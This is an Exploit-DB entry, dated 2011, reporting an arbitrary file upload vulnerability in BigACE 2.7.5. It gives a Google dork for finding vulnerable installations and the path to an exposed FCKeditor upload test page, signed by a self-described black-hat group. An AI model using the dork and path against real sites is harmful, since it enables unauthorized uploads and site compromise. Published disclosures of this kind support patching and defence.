BigACE 2.7.5 - Arbitrary File Upload

EDB-ID:

17080

CVE:

N/A

EDB Verified:

Author:

Net.Edit0r

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2011-03-30

Vulnerable App:

==========================================
Bigace 2.7.5 Remote Upload file Vulnerability
==========================================

[~]######################################### InformatioN
#############################################[~]

[~] Title     : Bigace 2.7.5 Remote Upload file Vulnerability
[~] Author    : Net.Edit0r
[~] Vendor or Software Link  : http://www.bigace.de/bigace-2.7.5.html
[~] Email     : Black.hat.tm@gmail.com
[~] Data  : 2011-03-29
[~] Google dork: "Powered by Bigace 2.7.5"
[~] Category:  [Webapps]
[~] Tested on: [Linux /php]

[~]#########################################   ExploiT
#############################################[~]

[~] ExploiT         :

/addon/FCKeditor/editor/filemanager/connectors/uploadtest.html

[~] Example         :

http://127.0.0.1//addon/FCKeditor/editor/filemanager/connectors/uploadtest.html

[~]######################################### ThankS To ...
############################################[~]

[~] Black Hat Group Member  :

Net.Edit0r & DarkCoder & fronk & Amir-MaGic & H3x & Milad.C0nn3ct0r #BHG

[~] IRANIAN Young HackerZ # Persian Gulf

[~]#########################################   FinisH :D
#############################################[~]################[~]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services